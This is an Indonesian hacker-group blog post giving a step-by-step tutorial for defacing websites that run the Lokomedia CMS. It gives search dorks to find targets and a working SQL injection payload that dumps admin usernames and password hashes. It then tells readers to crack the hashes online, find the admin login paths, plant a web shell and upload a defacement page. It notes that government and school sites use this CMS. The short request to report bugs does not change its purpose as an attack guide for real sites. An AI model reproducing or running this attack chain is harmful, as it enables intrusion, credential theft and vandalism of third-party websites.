AnonCyberTeam

Oke guys,welcome back to hacker zaman now :'v
kali ini gue mau ngasih tutor tentang bagaimana cara deface cms lokomedia ? what is lokomedia.
okey disini gue jelasin beberapa hal tentang lokomedia yang gue tau.
CEKIDOT

Lokomedia adalah salah satu CMS yang di gunakan oleh negara kita ini yaitu INDONESIA what kenapa indonesia? mana saya tau saya kan autis :'v

dan gasemua CMS Lokomedia itu bisa di EXPLOITASI, banyak berbagai cara attacker menyerang situs yang memiliki cms ini tak terkecuali site pemerintahan banyak site pemerintahan,organisasi,sekolah dll sebagainya memiliki cms ini, jadi tolong jika ada yang dapat bug cms ini segera lapor ke pada pihak admin atau patch sendiri, jangan asal tebas nanti pala lo gue tebas -_-

okey langsung saja bagaimana cara exploitasi nya ?
CEKIDOT

1. DORK
inurl:/statis-1-profil.html
- inurl:/statis-2-profil.html
- inurl:/statis-3-profil.html
Sisanya Use your brain ya :*


2. Exploit
 'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+

3. MD5 DECRYPTER


TUTORIAL

1. Taro Dork yang diatas ke search engine google.

2. Pilih salah satu target kalian ok cuk.

3. Dan injek site nya dengan ca ra dibawah ini :
http://site.co.li/statis-1-profil.html kalian tambahin exploit nya sesudah angka Jadinya gini:
   http://site.co.li/statis-1'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+-profil.html

4. nanti klo vuln liat bagian title site nya ada username/password adminnya

5. Tekan CTRL + U ( laptop/pc ) kalau di HP bagaimana? tinggal ketik di url view-source:www.site.com

6. akses site https://hashkiller.co.uk/md5-decrypter.aspx ( untuk hash passwordnya yang ke encrypt )

7. Lalu cari admin login nya (sisanya use your brain)
http://target.co.li/admin
http://target.co.li/adminweb
http://target.co.li/administrator
http://target.co.li/redaktu

8lalu tanem shell kalian ( use your brain, banyak ko di google cara tanem shell )

9. kalau sudah tanem shell klik kanan shell nya, lalu klik "Copy image location"

10. Tinggal upload sc kalian  inget jangan tebas index oc dipikir gampang bikin web :3


THX TO 
AnonCyberTeam - QwertyAloneCyber
Tags

2 Comments

Jangan Lupa Untuk Terus Visit blog kami : https://mrwho-404.blogspot.com/?m=1

  1. UnknownMarch 2, 2019 at 5:35 PM

    asw ngakak anj pas use your brains aowkowakowkowak

    ReplyDelete
  2. AestheticMarch 23, 2019 at 8:05 AM

    Jejak dulu gan, btw saling berkunjung dan follow yaa di blog Ensikology

    ReplyDelete

Post a Comment

Jangan Lupa Untuk Terus Visit blog kami : https://mrwho-404.blogspot.com/?m=1

Previous Post Next Post